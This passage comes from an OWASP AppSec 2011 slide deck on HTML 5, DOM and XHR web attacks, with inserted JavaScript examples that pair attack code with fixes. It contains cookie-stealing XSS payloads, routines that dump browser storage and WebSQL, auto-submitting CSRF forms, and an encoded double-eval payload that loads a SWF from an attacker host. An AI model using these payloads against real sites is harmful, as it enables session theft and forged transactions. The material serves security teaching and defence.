Next Generation Web Attacks – HTML 5, DOM (Level 3) and XHR (Level 2)

Shreeraj Shah
Blueinfy Solutions Pvt. Ltd.
shreeraj.shah@blueinfy.net

OWASP AppSec USA 2011
22nd Sept. 2011

Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.

The OWASP Foundation
http://www.owasp.org
Who Am I?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com

Founder & Director
   Blueinfy Solutions Pvt. Ltd.
   SecurityExposure.com
Past experience
   Net Square (Founder), Foundstone (R&D/Consulting), Chase (Middleware), IBM (Domino Dev)
Interest
   Web security research
Published research
   Articles / Papers – SecurityFocus, O'Reilly, DevX, InformIT etc.
   Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
   Advisories – .Net, Java servers etc.
   Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.
Books (Author)
   Web 2.0 Security – Defending Ajax, RIA and SOA
   Hacking Web Services
   Web Hacking


Agenda

 Next Generation Application's Attack Surface and Threat Model
 HTML 5 – Tags, Storage & WebSQL
 DOM – Vulnerabilities & Exploits
 Abusing Sockets, XHR & CSRF
 ClickJacking & Exploiting Rich HTML Components
 Reverse Engineering across DOM




ATTACK SURFACE AND
THREAT MODEL
Real Life Cases

 Last three years: several applications reviewed (banking, trading, portals, Web 2.0 sites etc.)
 Interesting outcomes and stats
 Automated scanning is becoming increasingly difficult, and impossible in some cases
 Sites are vulnerable and easily exploitable in many cases




Technology Shift & Trend
  [Diagram] Server-side components (Presentation Layer, Business Layer, Data Access Layer,
  Authentication, Communication etc.) sit on Runtime, Platform and Operating System
  components; the client-side components run in the browser:
    HTML 5: Storage, WebSocket, WebSQL, DOM, JS, XHR
    Flash: AMF, Flex
    Silverlight: WCF, XAML, .NET
    Mobile: Android, iPhone/iPad
    Other

Browser Model
  [Diagram] Browser model, four layers (mobile browsers included):
    Presentation: HTML5, Silverlight and Flash (plug-in)
    Process & Logic: JavaScript, DOM/Events, Parser/Threads, WebSQL, Storage
    Network & Access: XHR, WebSocket, Plug-in Sockets, on top of the browser's native network services
    Core Policies: Same Origin Policy (SOP), Sandbox

Layers
  Presentation
    HTML5
    Silverlight
    Flash/Flex
  Process & Logic
    JavaScript, Document Object Model (DOM - 3), Events,
    Parsers/Threads etc.
  Network & Access
    XHR – Level 2
    WebSockets
    Plugin-Sockets
  Core Policies
    SOP
    Sandboxing for iframe
    Shared Resources

Application Architecture
  [Diagram] The end client (browser stack: Ajax, RIA (Flash), HTML / JS / DOM) talks over
  the Internet to the Web Server and Application Server, behind which sit the Web Services,
  Data-access and Auth. Access components, the Database and the Authentication Server.
  The same client also pulls third-party content over the Internet from Trading, Weather,
  Email, Banking and Blog sites.

Attack Surface Expansion
  [Diagram] Entry points on both sides of the Ajax / RIA (Flash) / HTML / JS / DOM stack:
    Client side: DOM calls/events, HTTP response variables, JSON/XML streams, API streams
    Server side: POST name and value pairs, QueryString, XML/JSON etc., HTTP variables,
    Cookie etc., file attachments/uploads etc., Open APIs and integrated streams, feeds and
    other-party information

AppSec dynamics
  [Figure: AppSec dynamics. Source: OWASP]

Integration and Communications

 DOM glues everything together: it integrates Flex, Silverlight and HTML when needed
 Various ways to communicate: the native browser way, XHR and WebSockets
 Options for data sharing: JSON, XML, WCF, AMF etc. (many more)
 Browsers are supporting a new set of technologies and exposing more surface



Demos

 App using DOM, AJAX and Web Services
 HTML 5 components and usage
 Fingerprinting Application Assets from DOM or
 JavaScripts
 Frameworks, Scripts, Structures, and so on –
 DWR/Struts




Threat Model

  [Diagram] Ten threat classes placed on the browser model:
    1  XSS abuse with tags and attributes (Presentation: Tags & Attributes)
    2  DOM based XSS and redirects (Process & Logic: DOM)
    3  Stealing from the storage (Process & Logic: Storage)
    4  Injecting and exploiting WebSQL (Process & Logic: WebSQL)
    5  Abusing network API and sockets (Network & Access: XHR, WebSocket, Plug-in Sockets)
    6  CSRF across streams (Core Policies: Same Origin Policy)
    7  Sandbox attacks and ClickJacking (Presentation: Events; Core Policies: Sandbox)
    8  Abusing new features like drag-and-drop (Presentation: Thick Features)
    9  Botnet/Spynet using WebWorkers
    10 Threats to widgets and mashups

Mapping top 10 – Current Context
  A1 – Injection: JSON, AMF, WCF, XML injection along with WebSQL
  A2 – XSS: DOM based XSS, script injection through direct third-party streams, HTML5 tags
  A3 – Broken Authentication and Session Management: reverse engineering of
  authentication/authorization logic (JS, Flash or Silverlight) & LocalStorage
  A4 – Insecure Direct Object References: insecure data-access-level calls from the browser
  A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and sharing)
  A6 – Security Misconfiguration: insecure browsers, poor policies, trust model
  A7 – Failure to Restrict URL Access: hidden URLs and resource fetching discovered by
  reverse engineering
  A8 – Unvalidated Redirects and Forwards: DOM-based redirects and spoofing
  A9 – Insecure Cryptographic Storage: local storage inside the browser and global variables
  A10 – Insufficient Transport Layer Protection: Ajax and other calls going over non-SSL channels
  Mobile Top 10 …



HTML 5 – TAGS, STORAGE &
WEBSQL
Abusing HTML 5 Tags

  Various new tags and attributes can be abused; existing filters may not
  validate them (they were written before these attributes existed)

  Media tags
<video poster=javascript:alert(document.cookie)//
<audio><source onerror="javascript:alert(document.cookie)">


  Form tags
<form><button formaction="javascript:alert(document.cookie)">foo
<body oninput=alert(document.cookie)><input autofocus>
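A first-pass check for the vectors above, added here as an example (not code from the original slides): it scans tag/attribute pairs in an HTML fragment and flags `on*` handlers, `javascript:`/`data:` values in URL-bearing attributes such as `poster` and `formaction`, `autofocus` (which fires the `oninput`/`onfocus` chain without user interaction), and HTML 5 tags that rarely belong in user-supplied content. The tag and attribute lists are assumptions chosen for illustration; the regex is a detection aid, not a substitute for a real HTML parser or an allow-list sanitizer.

```javascript
// Added example: flag HTML 5 attribute/tag vectors before a fragment reaches the DOM.
// Heuristic tokenizer (regex, not a parser); use it to triage, not to sanitize.

// Assumed lists for illustration; tune to the application.
const URL_ATTRS = new Set(['src', 'href', 'poster', 'formaction', 'action', 'data', 'background']);
const HTML5_TAGS = new Set(['video', 'audio', 'source', 'track', 'embed', 'keygen', 'details', 'math', 'svg']);

// Strip surrounding quotes and control/whitespace characters, so "java\tscript:" and
// " JAVASCRIPT:" are normalised to "javascript:" before the scheme check.
function normalizeUrl(value) {
  return value.replace(/^["']|["']$/g, '').replace(/[\u0000-\u0020]/g, '').toLowerCase();
}

function findDangerousAttributes(html) {
  const findings = [];
  // Tag name plus everything up to '>' (or end of input, for truncated payloads like the video one).
  const tagRe = /<([a-zA-Z][\w:-]*)([^>]*)>?/g;
  // name, optional = value (quoted or bare)
  const attrRe = /([^\s=\/"'<>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const name = tag[1].toLowerCase();
    if (HTML5_TAGS.has(name)) findings.push({ tag: name, attr: null, reason: 'html5-tag' });
    attrRe.lastIndex = 0;
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      const aName = attr[1].toLowerCase();
      const aVal = attr[2] === undefined ? '' : normalizeUrl(attr[2]);
      if (aName.startsWith('on')) {
        findings.push({ tag: name, attr: aName, reason: 'event-handler' });
      } else if (URL_ATTRS.has(aName) && /^(javascript|vbscript|data):/.test(aVal)) {
        findings.push({ tag: name, attr: aName, reason: 'script-url' });
      } else if (aName === 'autofocus') {
        findings.push({ tag: name, attr: aName, reason: 'autofocus' });
      }
    }
  }
  return findings;
}

// The four payloads from the slide, run through the check.
const SLIDE_PAYLOADS = [
  '<video poster=javascript:alert(document.cookie)//',
  '<audio><source onerror="javascript:alert(document.cookie)">',
  '<form><button formaction="javascript:alert(document.cookie)">foo',
  '<body oninput=alert(document.cookie)><input autofocus>',
];
for (const p of SLIDE_PAYLOADS) console.log(p, '=>', findDangerousAttributes(p));
```

Each slide payload produces at least one finding, while ordinary markup such as `<a href="https://example.org">` produces none; a positive result should route the fragment to an allow-list sanitizer rather than to `innerHTML`.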


Attacking Storage

 HTML 5 adds Web Storage (localStorage/sessionStorage); applications use it
 to hold what used to live in global-scoped variables
 http://www.w3.org/TR/webstorage/




Attacking Storage

 It is possible to steal the stored values through XSS or any injected JavaScript
 getItem and setItem calls (plus length/key(i) to enumerate every key)
 XSS the box and scan through the storage




DOM Storage

 Applications run with a "rich" DOM
 JavaScript sets several variables and parameters while loading: GLOBALS
 They hold sensitive information; what if they are GLOBAL and remain for
 the life of the application?
 They can be retrieved with XSS
 HTTP requests and responses go through JavaScript (XHR): what about those
 variables?

What is wrong?




By default it's Global

  Here is the line of code (no var keyword, so temp becomes a global that
  keeps the credentials, and they travel in a GET URL):

    temp = "login.do?user="+user+"&pwd="+pwd;
    xmlhttp.open("GET",temp,true);
    xmlhttp.onreadystatechange=function()




DOM stealing

 It is possible to read these variables and the clear-text information in
 them: user/pass
 Responses and tokens
 Business information
 XHR calls and HTTP requests/responses
 Dummy XHR object injection (wrapping XMLHttpRequest to log every call)
 Lots of possibilities for exploitation

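The harvesting described on the storage and DOM-stealing slides, written out as an added example (not code from the original deck): the slide's leaky `temp` assignment beside a scoped, POST-based rewrite, and the two enumerations an injected script performs, over the global object and over Web Storage. Node has no `window` or `localStorage`, so `globalThis` stands in for `window` and a constructed object with the Web Storage API (`length`, `key(i)`, `getItem`, `setItem`) stands in for `localStorage`; in a browser you would pass `window` and `localStorage` directly.

```javascript
// Added example: what an XSS payload can collect from a "rich" DOM, and the fix.

// (1) The slide's pattern. In sloppy-mode script code a bare `temp = ...` creates a
//     global; writing it as globalThis.temp makes that explicit and keeps this file
//     valid under "use strict". The credentials now stay readable for the page lifetime.
function buildLoginUrlLeaky(user, pwd) {
  globalThis.temp = 'login.do?user=' + user + '&pwd=' + pwd;
  return globalThis.temp;
}

// (2) Hardened: block-scoped value, credentials in a POST body, nothing left on window.
function buildLoginRequest(user, pwd) {
  const body = new URLSearchParams({ user, pwd }).toString();
  return { method: 'POST', url: 'login.do', body };   // xhr.open('POST', url); xhr.send(body)
}

// (3) Attacker side: enumerate the global object for string values that look like
//     credentials or tokens. `root` is window in a browser, globalThis here.
function harvestGlobals(root, pattern = /(user|pwd|pass|token|session|auth)/i) {
  const hits = {};
  for (const key of Object.keys(root)) {
    const value = root[key];
    if (typeof value === 'string' && (pattern.test(key) || pattern.test(value))) hits[key] = value;
  }
  return hits;
}

// (4) Attacker side: dump Web Storage with the standard length/key(i)/getItem(k) calls,
//     exactly what a payload does before exfiltrating the result.
function harvestStorage(storage) {
  const dump = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    dump[k] = storage.getItem(k);
  }
  return dump;
}

// Constructed stand-in for window.localStorage (assumption: same API surface).
function makeFakeStorage(entries) {
  const m = new Map(Object.entries(entries));
  return {
    get length() { return m.size; },
    key: (i) => Array.from(m.keys())[i],
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    setItem: (k, v) => { m.set(k, String(v)); },
  };
}

buildLoginUrlLeaky('alice', 's3cret');
console.log(harvestGlobals(globalThis));   // the leaked login URL shows up under "temp"
console.log(harvestStorage(makeFakeStorage({ sessionToken: 'abc123', theme: 'dark' })));
console.log(buildLoginRequest('alice', 's3cret'));
```

The defensive point is in (2): values that must not survive the request live in function scope (or a closure), never on `window`, and anything the page really needs to keep client-side is treated as readable by any script that runs in the origin.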



Demo

 DOMTracer and profiling
 Accessing username and password




SQL Injection

 WebSQL (a W3C draft from the HTML 5 effort) provides an SQL database
 (SQLite) inside the browser itself.
 Allows one-time data loading and offline browsing capabilities.
 Causes security concern and creates potential injection points.
 Methods and calls are available to page script: openDatabase(),
 transaction() and executeSql()




SQL Injection

 Through JavaScript one can harvest the entire local database.
 Example
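An added example for the two WebSQL points above (not code from the original slides): a query built by string concatenation beside the parameterised form, and the harvesting routine an XSS payload runs, which lists every table through `sqlite_master` and then dumps each one. WebSQL's call shape is `openDatabase()` returning a `db` with `db.transaction(tx => tx.executeSql(sql, args, onSuccess, onError))`; Node has no WebSQL, so a constructed fake `db` with the same shape and canned result sets is used to run the code here, and the table contents are made up for the example.

```javascript
// Added example: WebSQL injection versus bound parameters, and full-database harvesting.

// Vulnerable: the user-controlled name is spliced into the statement, so the payload
//   x' OR '1'='1
// turns a one-row lookup into a full-table read.
function lookupUserVulnerable(tx, name) {
  const sql = "SELECT id, name, email FROM users WHERE name = '" + name + "'";
  tx.executeSql(sql, [], () => {});
  return sql;
}

// Fixed: a bound parameter; SQLite receives the value as data, never as SQL text.
function lookupUserSafe(tx, name) {
  const sql = 'SELECT id, name, email FROM users WHERE name = ?';
  tx.executeSql(sql, [name], () => {});
  return { sql, args: [name] };
}

// Attacker side (runs from an XSS payload): enumerate tables via sqlite_master, then
// dump each one. Callback style because that is the only API WebSQL offers.
function harvestWebSql(db, done) {
  const dump = {};
  db.transaction((tx) => {
    tx.executeSql("SELECT name FROM sqlite_master WHERE type = 'table'", [], (_, rs) => {
      const tables = [];
      for (let i = 0; i < rs.rows.length; i++) tables.push(rs.rows.item(i).name);
      let pending = tables.length;
      if (pending === 0) return done(dump);
      for (const t of tables) {
        // `t` comes from sqlite_master, not from the user, so concatenation is safe here.
        tx.executeSql('SELECT * FROM ' + t, [], (_, rows) => {
          dump[t] = [];
          for (let i = 0; i < rows.rows.length; i++) dump[t].push(rows.rows.item(i));
          if (--pending === 0) done(dump);
        });
      }
    });
  });
}

// Constructed fake database: canned result sets keyed by statement, mimicking
// SQLResultSet.rows (length + item(i)). Stand-in for openDatabase() in Node only.
function makeFakeDb(tables) {
  const rs = (arr) => ({ rows: { length: arr.length, item: (i) => arr[i] } });
  const tx = {
    executeSql(sql, args, ok) {
      if (sql.startsWith('SELECT name FROM sqlite_master')) {
        return ok(tx, rs(Object.keys(tables).map((name) => ({ name }))));
      }
      const m = /^SELECT \* FROM (\w+)$/.exec(sql);
      if (m && tables[m[1]]) return ok(tx, rs(tables[m[1]]));
      return ok(tx, rs([]));
    },
  };
  return { transaction: (fn) => fn(tx) };
}

const db = makeFakeDb({
  users: [{ id: 1, name: 'alice', email: 'a@example.org' }],   // constructed sample rows
  prefs: [{ k: 'theme', v: 'dark' }],
});
db.transaction((tx) => {
  console.log(lookupUserVulnerable(tx, "x' OR '1'='1"));   // the injected statement
  console.log(lookupUserSafe(tx, "x' OR '1'='1"));         // same input, bound as data
});
harvestWebSql(db, (dump) => console.log(JSON.stringify(dump)));
```

Two things matter in practice: anything the page can query, an injected script can query too, so WebSQL content is only as confidential as the origin is XSS-free; and the `?` placeholder is the whole fix for the injection case, since `executeSql` binds the `args` array natively.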




DOM – VULNERABILITIES &
EXPLOITS
DOM Architecture




DOM Calls

 Ajax/Flash/Silverlight: async calls

 [Diagram] HTML / CSS / RIA -> JS / DOM -> XMLHttpRequest (XHR), asynchronous over
 HTTP(S) -> Web Server -> XML / Middleware / Text -> Database / Resource

DOM Calls

 [Diagram] Stream formats consumed by DOM calls: JSON, XML, JS-Script, JS-Object, JS-Array

DOM based XSS

 It is a sleeping giant in Ajax applications
 Root cause
   DOM is already loaded
   Application is single-page and the DOM stays the same
   New information has to be injected with DOM calls, or evaluated with eval()
   Information is coming from untrusted sources




Example cases

 DOM based XSS can take place in various different ways
 Example
   A simple DOM function uses the URL to drive Ajax calls
   Third-party content goes into the existing DOM and the call is not secure
   Ajax call from the application: what if we make a direct call to the
   link? JSON may cause XSS




DOM based URL parsing

 Ajax applications are already loaded and developers may be using a static
 function to pass arguments from the URL
 For example
   hu = window.location.search.substring(1);
   The above value goes into the following Ajax call
      eval('getProduct('+ hu.toString()+')');
   DOM based XSS: anything after ?1); in the URL executes




Demo

 Scanning with DOMScan
 Injecting payload in the call




Third Party Streaming

  [Diagram] The browser stack (Ajax, RIA (Flash/Silver), HTML / JS / DOM) consumes streams
  over the Internet from the application (Web Services end point, Database, Authentication,
  application infrastructure) and from third parties (Documents, News, Weather, Mails,
  Bank/Trade, RSS feeds, Blog); an attacker who controls any stream that is passed to
  eval() gets XSS

Stream processing


    if (http.readyState == 4) {
            var response = http.responseText;
            var p = eval("(" + response + ")");    // untrusted stream evaluated as code
            document.open();
            document.write(p.firstName+"<br>");    // fields re-parsed as HTML
            document.write(p.lastName+"<br>");
            document.write(p.phoneNumbers[0]);
            document.close();
    }

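The two `eval()` patterns from the "DOM based URL parsing" and "Stream processing" slides, each beside a rewrite that keeps untrusted text as data, added here as an example (not code from the original deck). Node has no `window` or `document`, so the functions take the raw query string and response text as arguments and return what they would render; the digits-only rule for the product id is an assumption for illustration, and `getProduct` is passed in as a callback because the page does not define it.

```javascript
// Added example: eval() of URL and stream input, and the data-only rewrites.

// Vulnerable 1: the URL parameter is concatenated into eval(), so a URL ending in
//   ?1);alert(document.cookie);//
// runs the injected statement. Kept only as the reference "before"; never call on real input.
function loadProductVulnerable(queryString, getProduct) {
  const hu = queryString.substring(1);                 // window.location.search.substring(1)
  return eval('getProduct(' + hu + ')');
}

// Fixed 1: parse the query string, validate against an allow-list pattern, pass a value.
function loadProductSafe(queryString, getProduct) {
  const id = new URLSearchParams(queryString).get('id');
  if (id === null || !/^\d{1,9}$/.test(id)) throw new Error('invalid product id');
  return getProduct(Number(id));
}

// Vulnerable 2: eval("(" + response + ")") executes whatever the stream carries, and
// document.write() then re-parses every field as HTML.
function renderContactVulnerable(responseText) {
  const p = eval('(' + responseText + ')');
  return p.firstName + '<br>' + p.lastName + '<br>' + p.phoneNumbers[0];   // as document.write() would emit
}

// Fixed 2: JSON.parse() rejects anything that is not JSON, the shape is checked, and the
// fields are treated as text (textContent in a browser; HTML-escaped here so the returned
// string is safe to place in markup).
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderContactSafe(responseText) {
  let p;
  try { p = JSON.parse(responseText); } catch (e) { throw new Error('stream is not JSON'); }
  if (typeof p !== 'object' || p === null || !Array.isArray(p.phoneNumbers)) throw new Error('unexpected shape');
  return [p.firstName, p.lastName, p.phoneNumbers[0]].map(escapeHtml).join('<br>');
}

// Constructed inputs.
const getProduct = (id) => ({ id, name: 'product ' + id });
console.log(loadProductSafe('?id=3', getProduct));
console.log(renderContactSafe('{"firstName":"<img src=x onerror=alert(1)>","lastName":"Doe","phoneNumbers":["555-0100"]}'));
try { loadProductSafe('?id=1);alert(document.cookie);//', getProduct); } catch (e) { console.log('rejected:', e.message); }
```

The rewrite does not need `eval()` at all: the URL is a list of key/value strings and the stream is JSON, and both have dedicated parsers that return data rather than executing it.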



Polluting Streams
  [Diagram] An attacker (8008) sits in the path via a proxy to the Web Server and the Web
  apps/DBs behind it; the returned stream (XML / JS-Object / JS-Array / JS-Script / JSON)
  reaches the Web Client, is passed to eval(), and XSS results

Exploiting DOM calls

  Examples of vulnerable calls (sinks):

  document.write(…)
  document.writeln(…)
  document.body.innerHTML=…
  document.forms[0].action=…
  document.attachEvent(…)
  document.create…(…)
  document.execCommand(…)
  document.body. …
  window.attachEvent(…)
  document.location=…
  document.location.hostname=…
  document.location.replace(…)
  document.location.assign(…)
  document.URL=…
  window.navigate(…)
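A first-pass static scan in the spirit of the DOMScan demos, added here as an example (not the DOMScan tool or code from the original slides). It walks JavaScript source line by line, flags statements that reach one of the sinks listed above (plus `eval`, `Function` and string-argument timers), and marks a hit as high when a DOM source (`location.*`, `document.URL`/`referrer`/`cookie`, `window.name`, `responseText`, `postMessage` data) or a variable previously assigned from such a source appears on the same line. The sample source is constructed from the snippets on the preceding slides. Same-line matching with one level of variable taint is a heuristic: it misses flows through functions and object fields and flags some safe uses, so treat hits as review candidates, not confirmed bugs.

```javascript
// Added example: regex-based source/sink scan for DOM based XSS candidates.

const SOURCES = [
  /\blocation\.(search|hash|href|pathname)\b/,
  /\bdocument\.(URL|documentURI|referrer|cookie)\b/,
  /\bwindow\.name\b/,
  /\bresponseText\b/,
  /\bevent\.data\b|\be\.data\b/,
];

const SINKS = [
  /\beval\s*\(/, /\bFunction\s*\(/, /\bsetTimeout\s*\(\s*["'`]/, /\bsetInterval\s*\(\s*["'`]/,
  /\bdocument\.write(ln)?\s*\(/, /\.innerHTML\s*=/, /\.outerHTML\s*=/, /\binsertAdjacentHTML\s*\(/,
  /\bdocument\.execCommand\s*\(/, /\b(document|window)\.location(\.(href|hostname))?\s*=/,
  /\blocation\.(replace|assign)\s*\(/, /\bwindow\.navigate\s*\(/, /\.(src|action|formaction)\s*=/,
  /\bdocument\.createElement\s*\(/, /\.attachEvent\s*\(/,
];

function scanForDomXss(source) {
  const findings = [];
  const tainted = new Set();   // identifiers assigned from a source earlier in the file
  source.split('\n').forEach((line, idx) => {
    const assign = /^\s*(?:(?:var|let|const)\s+)?([A-Za-z_$][\w$]*)\s*=/.exec(line);
    const taintedHere = [...tainted].some((id) =>
      new RegExp('\\b' + id.replace(/\$/g, '\\$') + '\\b').test(line));
    const hasSource = SOURCES.some((re) => re.test(line)) || taintedHere;
    if (assign && hasSource) tainted.add(assign[1]);
    const sink = SINKS.find((re) => re.test(line));
    if (!sink) return;
    findings.push({
      line: idx + 1,
      sink: sink.source,
      severity: hasSource ? 'high' : 'review',
      text: line.trim(),
    });
  });
  return findings;
}

// Constructed sample: the patterns from the previous slides plus one safe line.
const SAMPLE = [
  "var hu = window.location.search.substring(1);",
  "eval('getProduct(' + hu + ')');",
  "var p = eval('(' + http.responseText + ')');",
  "document.write(p.firstName + '<br>');",
  "document.getElementsByName('login').item(0).src = 'http://evil/login.swf';",
  "el.textContent = location.hash;",
].join('\n');

console.log(scanForDomXss(SAMPLE));
```

On the sample this reports the two `eval()` lines and the `document.write()` line as high (their inputs trace back to `location.search` and `responseText`), the `.src =` assignment as a review item, and nothing for the `textContent` line, which is not a sink.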
Demo

 Sample call demo
 DOMScan to identify vulnerability




Direct Ajax Call

 An Ajax function makes a back-end call
 The back-end returns a JSON stream (or another format) which gets
 injected into the DOM
 In some libraries the response content type allows the stream to be
 loaded in the browser directly
 In that case DOM processing is bypassed …




Demo

 DWR/JSON call – bypassing and direct stream
 access




ABUSING SOCKETS, XHR &
CSRF
Abusing network calls

 HTML 5 provides WebSocket and XHR Level 2 calls
 They allow cross-domain calls and raw socket capabilities
 They can be leveraged by a JavaScript payload
 Malware or a worm can use them to perform several scanning tasks




Internal Scanning

 Allows internal network scanning, setting up a backward hidden channel,
 and opening calls to a proxy/cache.
 Some browsers have blocked these calls for security reasons.




XHR/CSRF ETC.


XHR – Level 2 calls
  XHR is now at Level 2 in browsers
  Behaviour differs from browser to browser
  XHR Level 2 is already implemented
  Shared resource policy implemented
  "Origin" request header and "Access-Control-*" response headers, and
  decisions based on them
  Potential abuses
     One-way stealth channel
     CSRF possible (the cross-origin response is hidden from the attacker,
     but the request reaches the server; cookies are attached only when
     withCredentials is set)
     Header changes
  CORS - http://www.w3.org/TR/cors/ (Cross-Origin Resource Sharing)

CSRF

 CSRF is possible with Web 2.0 streams by abusing DOM calls
   XML manipulations
   CSRF with JSON
   AMFX is also an XML stream
 Attacker injects a simple HTML payload
 It initiates a request from the browser to the target cross-domain



How it works?




JSON

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
  action="http://192.168.100.101/json/jservice.ashx"
  METHOD="POST">
     <input type="hidden"
  name='{"id":3,"method":"getProduct","params":{ "id" : 3}}'
  value='foo'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>



HTTP Req.

POST /json/jservice.ashx HTTP/1.1
Host: 192.168.100.2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3)
   Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: text/plain
Content-Length: 57

{"id":3,"method":"getProduct","params":{ "id" : 3}}=foo


HTTP Resp.

HTTP/1.1 200 OK
Date: Sat, 17 Jul 2010 09:14:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 1135
{"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image
      _path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the
      Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political
      landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about
      him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he
      cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik
      General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic,
      sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that
      followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}}


AMF

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
   action="http://192.168.100.101:8080/samples/messagebroker/http"
   METHOD="POST">
     <input type="hidden" name='<amfx ver' value='"3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits/></object><null/><string/><string/><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>68AFD7CE-BFE2-4881-E6FD-694A0148122B</string><int>5</int><int>0</int><int>0</int></object></body></amfx>'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>

XML

 <html>
 <body>
 <FORM NAME="buy" ENCTYPE="text/plain"
 action="http://trade.example.com/xmlrpc/trade.rem"
 METHOD="POST">
      <input type="hidden" name='<?xml version'
 value='"1.0"?><methodCall><methodName>stocks.buy</methodN
 ame><params><param><value><string>MSFT</string></value>
 </param><param><value><double>26</double></value></para
 m></params></methodCall>'>
 </FORM>
 <script>document.buy.submit();</script>
 </body>
 </html>




Demos

 Simple trade demo – XML-RPC call CSRF.




FLASHJACKING


Flashjacking
  It is possible to combine attacks
    DOM based XSS
    CSRF
    Flash
  A DOM based issue can swap the flash/swf file at run time; the user will
  not notice
  Example
    document.getElementsByName("login").item(0).src = "http://evil/login.swf"


Double eval – eval the eval
  Payload:
  document.getElementsByName('Login').item(0).src='http://192.168.100.200:8080/flex/Loginn/Loginn.swf'
  Converted for double eval, so that ' and " need not appear in the
  injected string (String.fromCharCode rebuilds the payload above):
     eval(String.fromCharCode(100,111,99,117,109,101,110,116,4
     6,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97
     ,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,10
     9,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49
     ,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,4
     7,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103
     ,105,110,110,46,115,119,102,39))

Silverlightjacking
  It is possible to combine attacks
     DOM based XSS
     CSRF
     Silverlight files
  A DOM based issue can swap the xap file at run time; the user will not
  notice
  Example
     document.getElementsByName("login").item(0).src = "http://evil/login.xap"


RICH HTML COMPONENTS


Widgets

 Widgets/Gadgets/Modules are popular with Web 2.0 applications
 Small programs that run in the browser
 JavaScript and HTML based components
 In some cases they share the same DOM. Yes, the same DOM
 That creates cross-widget channels
 Exploitable …


Cross DOM Access




  [Diagram] Widget 1 (Email Widget), Widget 2 (RSS Feed Reader) and Widget 3 (Attacker)
  all sit on one shared DOM; the attacker widget sets the trap there




DOM traps

 It is possible to access the other widgets' DOM events, variables, logic etc.
 A sandbox is required at the architecture layer to protect against
 cross-widget access
 Segregating the DOM with iframes may help
 Flash based widgets have their own issues as well
 Code analysis of widgets before allowing them to load

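The isolation the "DOM traps" slide calls for, written out as an added example (not code from the original deck). Each widget is loaded in its own sandboxed iframe from a widget-only origin, so it holds no reference to the host DOM or to sibling widgets; the only channel back is `postMessage`, and the host accepts messages only from registered widget origins and only for an allow-listed set of operations. The widget origins, host origin and operation names are assumptions for illustration. Node has no DOM, so the message handler takes a `MessageEvent`-shaped object and returns its decision, and the frame helper returns the attributes it would set on the `<iframe>`.

```javascript
// Added example: iframe + postMessage isolation for third-party widgets.

const HOST_ORIGIN = 'https://portal.example.com';                                        // assumption
const WIDGET_ORIGINS = new Set(['https://mail-widget.example.net', 'https://rss-widget.example.org']); // assumption
const ALLOWED_OPS = new Set(['resize', 'openUrl']);                                      // assumption

// Host page: attributes for a widget frame. The widget origin differs from the host, so
// allow-same-origin only preserves the widget's own (non-host) origin, which is what makes
// event.origin checkable below. Never combine allow-scripts with allow-same-origin for a
// frame served from the host's own origin: the framed script could then remove its sandbox.
function widgetFrameAttributes(widgetUrl) {
  const u = new URL(widgetUrl);
  if (u.origin === HOST_ORIGIN) throw new Error('widgets must not be served from the host origin');
  if (!WIDGET_ORIGINS.has(u.origin)) throw new Error('unregistered widget origin ' + u.origin);
  return { src: u.href, sandbox: 'allow-scripts allow-same-origin allow-forms', referrerpolicy: 'no-referrer' };
}

// Host page: the onmessage handler. Origin check first, then a schema check; the payload
// is data, never eval()'d, and a widget can never address another widget's DOM.
function handleWidgetMessage(event) {
  if (!WIDGET_ORIGINS.has(event.origin)) return { accepted: false, reason: 'origin' };
  let msg = event.data;
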